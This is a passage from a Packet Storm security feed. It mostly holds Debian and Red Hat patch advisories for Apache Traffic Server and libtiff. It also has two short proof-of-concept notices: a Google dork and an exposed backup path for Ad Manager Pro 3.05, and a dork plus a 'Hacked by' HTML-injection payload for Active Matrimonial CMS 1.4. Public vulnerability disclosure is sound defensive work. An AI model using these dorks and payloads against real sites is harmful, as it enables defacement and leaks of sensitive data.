7MxRT/9ItrCOXhLT70Y2aIy6YXAXxXlYt0OrwZQY70XL2UkM75iJVAX9XUxszv9R  
TEEKpPs9mXSPorShZFbe9HoTkBg56OXdd50xxKLmZgtAidVzS0+6XesiMd17Rlc2  
gFr41/k6/3xIcMxKJpp+ru/dyrOAn37YSdgmU6Z0gf7BeODVhh1i7fs1mFujrHDV  
wij1ZCJtOCKAH7LtVDcoeXnbcHiPQuk68RFNf4B5ys4TDqGaCrKArq5i8BBhmYeK  
zg9AlSmC48/fWlp6DRDnAHN5u5chUFchxNv6bB5L+386TA2PUiFUrZT6QzCo5vgg  
PpthfSg8bfrnz5NvAVIktlml9PvziIVcHRFWBg3+DBV51N7kTKTwzTE33dLSsKYI  
IMHXQLzJJF5ds7/+SIKI9C5knGyH+1UCTAynXjJhGK/uPWh5BaZB5dQTK9ByK551  
TFl4FG60KEHvjtYeVSG/dADkafu9qa0UERj1c8TuvLakOlFETrLhjZK2O44S1xlC  
RZZjZAfJsSC5cwKHUT2qcD9aDRahzfbLi5ppNa+UYPnfkLaXNZZy/sRjF6duDYoN  
ZmTbzLEddzg=  
=O2OK  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3741-01

Debian Linux Security Advisory 5435-1 - Several vulnerabilities were discovered in Apache Traffic Server, a reverse and forward proxy server, which could result in information disclosure or denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5435-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJune 21, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : trafficserverCVE ID         : CVE-2022-47184 CVE-2023-30631 CVE-2023-33933Debian Bug     : 1038248Several vulnerabilities were discovered in Apache Traffic Server, areverse and forward proxy server, which could result in informationdisclosure or denial of service.For the oldstable distribution (bullseye), these problems have been fixedin version 8.1.7+ds-1~deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 9.2.0+ds-1~deb12u1.We recommend that you upgrade your trafficserver packages.For the detailed security status of trafficserver please refer toits security tracker page at:https://security-tracker.debian.org/tracker/trafficserverFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmSTawMACgkQEMKTtsN8TjabNQ//ZLXy7eFx3FYDxsWkE3rnWo3u695ot3XpyxB+8pTR8O2FzK3USXBr+Kucmes+C4S7KUDX/PcrkqSmAhzJGE+3bXICIsg2r1WNpDSbM3ko6CS8hi9YEA5rQ9AcHk9Quwz3eKXXWuGhzPI4tTtZrY6ou+Sfpveljct8RR5QK2YRxy2S5Ri6QRdkz857sX183PP6TARBV+Tb65m62SEpUiLywgNAUWetTxUYHOwPGWsnKAoYDK24GP93pthfKt3m7+MR/5ObneDDn4AT9EMcW4DQ4RQU1uNAXlcv1SwLXzKu7RhVFD0r0x81tYmBXb/vS3jP0JUdebJBSxbHfXxHuYQh/R4NooftqZmzGvJm5JpTaPY/uPB0gr8BsAi2Vt9QmUzmi1WgKp5i0SyquUgwfdBFxZHQFLzN6fcYgYHjsmB/whJVDHNaKe4SxV/YUY1GZlriNbZqAVnz8vHN2f0Xb69ZIrGZeGEzWe3ZwtSJONpQ4jJsOxJzXWfpgRWe5uQDqXxhsnFs4C/GeOlQE897kussMeslQPrOYK11bbVrjezc+HBoBc/NUA9aGhuZ1srWYzdjogL7zWfo+IlWdTRDDEth1f3wqwQp7qJLlSHPzHvInlNeWjumGYIcYvgQdZdZ4lX6h4l035DntwwcewGQTsGAP3+6YnWPwlS3E8Ltu/q8iSA==HRw4-----END PGP SIGNATURE-----

Debian Security Advisory 5435-1

Ad Manager Pro version 3.05 suffers from a backup disclosure vulnerability.

    ====================================================================================================================================| # Title     : Ad Manager Pro 3.05 Backup Disclosure Vulnerability                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0.2(64-bit)                                            | | # Vendor    : http://www.P30vel.ir                                                                                               |  | # Dork      :                                                                                                                    |====================================================================================================================================P0C :[+] appears to leave backups in a world accessible directory under the document root & The plugin exports a backup exported as a text file and contains sensitive informations.[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /admanager/data/[+] https://127.0.0.1/localhost/admanager/data/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |=======================================================================================================================================

Ad Manager Pro 3.05 Backup Disclosure

Active Matrimonial CMS version 1.4 suffers from an html injection vulnerability.

    ====================================================================================================================================| # Title     : Active Matrimonial CMS v 1.4 HTML inject Vulnerability                                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            | | # Vendor    : https://activeitzone.com/                                                                                          |  | # Dork      : "Copyright © 2019 Active Matrimonial CMS - All Rights Reserved "                                                   |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Register new member .[+] Go to edit your profil http://127.0.0.1/xywarscom/home/profile[+] in Introduction box , put your code or use this code for test :<marquee><font color=lime size=32>Hacked by indoushka</font></marquee></tr><td align="center"><a href="https://cxsecurity.com/author/indoushka/1/"><img src="https://cert.cx/cxstatic/images/12018/cxseci.png" alt="" width="650" height="120" border="0"></a></tr>====Greetings to :===================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |=====================================================================================================================================

Active Matrimonial CMS 1.4 HTML Injection

Red Hat Security Advisory 2023-3711-01 - The libtiff packages contain a library of functions for manipulating Tagged Image File Format files. Issues addressed include buffer overflow, out of bounds read, out of bounds write, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: libtiff security update  
Advisory ID:       RHSA-2023:3711-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3711  
Issue date:        2023-06-21  
CVE Names:         CVE-2022-48281 CVE-2023-0795 CVE-2023-0796   
                   CVE-2023-0797 CVE-2023-0798 CVE-2023-0799   
                   CVE-2023-0800 CVE-2023-0801 CVE-2023-0802   
                   CVE-2023-0803 CVE-2023-0804   
=====================================================================

1. Summary:

An update for libtiff is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux CRB (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

The libtiff packages contain a library of functions for manipulating Tagged  
Image File Format (TIFF) files.

Security Fix(es):

* libtiff: heap-based buffer overflow in processCropSelections() in  
tools/tiffcrop.c (CVE-2022-48281)

* libtiff: out-of-bounds read in extractContigSamplesShifted16bits() in  
tools/tiffcrop.c (CVE-2023-0795)

* libtiff: out-of-bounds read in extractContigSamplesShifted24bits() in  
tools/tiffcrop.c (CVE-2023-0796)

* libtiff: out-of-bounds read in _TIFFmemcpy() in libtiff/tif_unix.c when  
called by functions in tools/tiffcrop.c (CVE-2023-0797)

* libtiff: out-of-bounds read in extractContigSamplesShifted8bits() in  
tools/tiffcrop.c (CVE-2023-0798)

* libtiff: use-after-free in extractContigSamplesShifted32bits() in  
tools/tiffcrop.c (CVE-2023-0799)

* libtiff: out-of-bounds write in extractContigSamplesShifted16bits() in  
tools/tiffcrop.c (CVE-2023-0800)

* libtiff: out-of-bounds write in _TIFFmemcpy() in libtiff/tif_unix.c when  
called by functions in tools/tiffcrop.c (CVE-2023-0801)

* libtiff: out-of-bounds write in extractContigSamplesShifted32bits() in  
tools/tiffcrop.c (CVE-2023-0802)

* libtiff: out-of-bounds write in extractContigSamplesShifted16bits() in  
tools/tiffcrop.c (CVE-2023-0803)

* libtiff: out-of-bounds write in extractContigSamplesShifted24bits() in  
tools/tiffcrop.c (CVE-2023-0804)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running applications linked against libtiff must be restarted for this  
update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2163606 - CVE-2022-48281 libtiff: heap-based buffer overflow in processCropSelections() in tools/tiffcrop.c  
2170119 - CVE-2023-0795 libtiff: out-of-bounds read in extractContigSamplesShifted16bits() in tools/tiffcrop.c  
2170146 - CVE-2023-0796 libtiff: out-of-bounds read in extractContigSamplesShifted24bits() in tools/tiffcrop.c  
2170151 - CVE-2023-0797 libtiff: out-of-bounds read in _TIFFmemcpy() in libtiff/tif_unix.c when called by functions in tools/tiffcrop.c  
2170157 - CVE-2023-0798 libtiff: out-of-bounds read in extractContigSamplesShifted8bits() in tools/tiffcrop.c  
2170162 - CVE-2023-0799 libtiff: use-after-free in extractContigSamplesShifted32bits() in tools/tiffcrop.c  
2170167 - CVE-2023-0800 libtiff: out-of-bounds write in extractContigSamplesShifted16bits() in tools/tiffcrop.c  
2170172 - CVE-2023-0801 libtiff: out-of-bounds write in _TIFFmemcpy() in libtiff/tif_unix.c when called by functions in tools/tiffcrop.c  
2170178 - CVE-2023-0802 libtiff: out-of-bounds write in extractContigSamplesShifted32bits() in tools/tiffcrop.c  
2170187 - CVE-2023-0803 libtiff: out-of-bounds write in extractContigSamplesShifted16bits() in tools/tiffcrop.c  
2170192 - CVE-2023-0804 libtiff: out-of-bounds write in extractContigSamplesShifted24bits() in tools/tiffcrop.c

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
libtiff-4.4.0-8.el9_2.src.rpm

aarch64:  
libtiff-4.4.0-8.el9_2.aarch64.rpm  
libtiff-debuginfo-4.4.0-8.el9_2.aarch64.rpm  
libtiff-debugsource-4.4.0-8.el9_2.aarch64.rpm  
libtiff-devel-4.4.0-8.el9_2.aarch64.rpm  
libtiff-tools-debuginfo-4.4.0-8.el9_2.aarch64.rpm

ppc64le:  
libtiff-4.4.0-8.el9_2.ppc64le.rpm  
libtiff-debuginfo-4.4.0-8.el9_2.ppc64le.rpm  
libtiff-debugsource-4.4.0-8.el9_2.ppc64le.rpm  
libtiff-devel-4.4.0-8.el9_2.ppc64le.rpm  
libtiff-tools-debuginfo-4.4.0-8.el9_2.ppc64le.rpm

s390x:  
libtiff-4.4.0-8.el9_2.s390x.rpm  
libtiff-debuginfo-4.4.0-8.el9_2.s390x.rpm  
libtiff-debugsource-4.4.0-8.el9_2.s390x.rpm  
libtiff-devel-4.4.0-8.el9_2.s390x.rpm  
libtiff-tools-debuginfo-4.4.0-8.el9_2.s390x.rpm

x86_64:  
libtiff-4.4.0-8.el9_2.i686.rpm  
libtiff-4.4.0-8.el9_2.x86_64.rpm  
libtiff-debuginfo-4.4.0-8.el9_2.i686.rpm  
libtiff-debuginfo-4.4.0-8.el9_2.x86_64.rpm  
libtiff-debugsource-4.4.0-8.el9_2.i686.rpm  
libtiff-debugsource-4.4.0-8.el9_2.x86_64.rpm  
libtiff-devel-4.4.0-8.el9_2.i686.rpm  
libtiff-devel-4.4.0-8.el9_2.x86_64.rpm  
libtiff-tools-debuginfo-4.4.0-8.el9_2.i686.rpm  
libtiff-tools-debuginfo-4.4.0-8.el9_2.x86_64.rpm

Red Hat Enterprise Linux CRB (v. 9):

aarch64:  
libtiff-debuginfo-4.4.0-8.el9_2.aarch64.rpm  
libtiff-debugsource-4.4.0-8.el9_2.aarch64.rpm  
libtiff-tools-4.4.0-8.el9_2.aarch64.rpm  
libtiff-tools-debuginfo-4.4.0-8.el9_2.aarch64.rpm

ppc64le:  
libtiff-debuginfo-4.4.0-8.el9_2.ppc64le.rpm  
libtiff-debugsource-4.4.0-8.el9_2.ppc64le.rpm  
libtiff-tools-4.4.0-8.el9_2.ppc64le.rpm  
libtiff-tools-debuginfo-4.4.0-8.el9_2.ppc64le.rpm

s390x:  
libtiff-debuginfo-4.4.0-8.el9_2.s390x.rpm  
libtiff-debugsource-4.4.0-8.el9_2.s390x.rpm  
libtiff-tools-4.4.0-8.el9_2.s390x.rpm  
libtiff-tools-debuginfo-4.4.0-8.el9_2.s390x.rpm

x86_64:  
libtiff-debuginfo-4.4.0-8.el9_2.x86_64.rpm  
libtiff-debugsource-4.4.0-8.el9_2.x86_64.rpm  
libtiff-tools-4.4.0-8.el9_2.x86_64.rpm  
libtiff-tools-debuginfo-4.4.0-8.el9_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-48281  
https://access.redhat.com/security/cve/CVE-2023-0795  
https://access.redhat.com/security/cve/CVE-2023-0796  
https://access.redhat.com/security/cve/CVE-2023-0797  
https://access.redhat.com/security/cve/CVE-2023-0798  
https://access.redhat.com/security/cve/CVE-2023-0799  
https://access.redhat.com/security/cve/CVE-2023-0800  
https://access.redhat.com/security/cve/CVE-2023-0801  
https://access.redhat.com/security/cve/CVE-2023-0802  
https://access.redhat.com/security/cve/CVE-2023-0803  
https://access.redhat.com/security/cve/CVE-2023-0804  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZJNw3tzjgjWX9erEAQj0oxAAhzSddta1naIRPjnMycqfY1HI+YaJYdAy  
CpH+rSz6Ff+QjgqByMU8t9QaoYmjRsatR7DhIU5CKt0+8bGUFTBQdTqDUJnYL4F9  
w2YMdm5Xl9rh9QrxUB3G2P8BnJyOIvKTiRBRYfpw9XpV0iDq+g3cjkF+YuCRyqeU  
e0ShOUOYJx7J0xB3WPFFIj76QlmvS58143VC4I6M8NMjUsBpqcTecIzd3iDMOXNO  
c/tYqcfZuP/8pSPM4aqx/hYinNH8YD5LJ6cyZo43Wj+foXWJASzRbBTJEzJQyVlZ  
vQ/b+uFapC/ueXkI+zPh+53kfZc3zHUCQGMqroHvX3r/f0UaBAa+Un3ehKQMuK40  
3iH81CnAIfp2aBQGewI0SOoxFbHeYdhH2bVQn6PSsZZ8IjQz/uEBj00SluEoauVP  
WAESoq/dhgT81mxJdU+5tChWzV2gZdOqPSCVo9fYFyR5B0lcmuaDlGgmX+ppCrXn  
Kq2CQS6A7t55T9D8dV2R/PzG22b5va461+o5glGkmCCHwn8E5At0Rzp3k2W22YoA  
Pq0dQq6TUE0RHXI2zCkE7BKs4OepPTnGH0EiuJRGPdhDOq9qQjfe78/MQyN389sz  
GjmnSbMuXMH6XIVhC8+lH9EWNTHLf04SSi5wgIyPuB8k0hD+CowzyH7A95Y4Ndl8  
1bWeHjx+RSM=  
=n7mF  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Source

Packet Storm